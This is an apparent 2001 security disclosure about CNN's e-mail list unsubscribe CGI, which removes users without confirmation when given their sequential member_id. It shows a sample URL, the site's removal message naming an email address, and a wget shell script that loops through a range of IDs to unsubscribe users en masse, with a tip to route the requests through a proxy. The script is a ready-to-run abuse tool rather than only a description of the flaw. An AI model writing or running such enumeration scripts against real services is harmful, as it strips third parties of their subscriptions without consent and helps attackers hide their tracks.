CNN List Un-Subscribe bot

# Date: 8/22/01
# Author: Jay Daniels <psaux@zdnetonebox.com>


PROBLEM:  
Anyone can Un-Subscribe other users from CNN's distribution list by placing a 
random number at the end of unsubscribe cgi URL's member_id.

CAUSE: There is no confirmation request!  I can't remember if there is a 
confirmation request when subscribing, if not then a similar method could be 
used to post/subscribe others without their knowledge.

[example: quicknews]

http://cgi.cnn.com/cgi-bin/quicknews/register1?member_id=3465865

[output]
>User removed
>The email address jay@thecompany.com has been removed from the e-wiretext 
>distribution list(s). This change should take effect within 24 hours.

I do not know the exact range for member_id so you can just start at [start_memid]
and go up.


Now you could make a simple shell script to do this using wget:

#!/bin/sh
# you may want to use a proxy or adjust wget options see %wget -h

# path for wget
path="/usr/bin"


if [ $# != 2 ]; then
  echo "Usage: $0 [start_memid] [stop_memid]"
  exit 1
fi


count=$(($1))

while [ "$count" -le "$2" ]; do
  $path/wget -a $0.log http://cgi.cnn.com/cgi-bin/quicknews/register1?member_id=$count
  count=$(($count + 1))
done

exit 0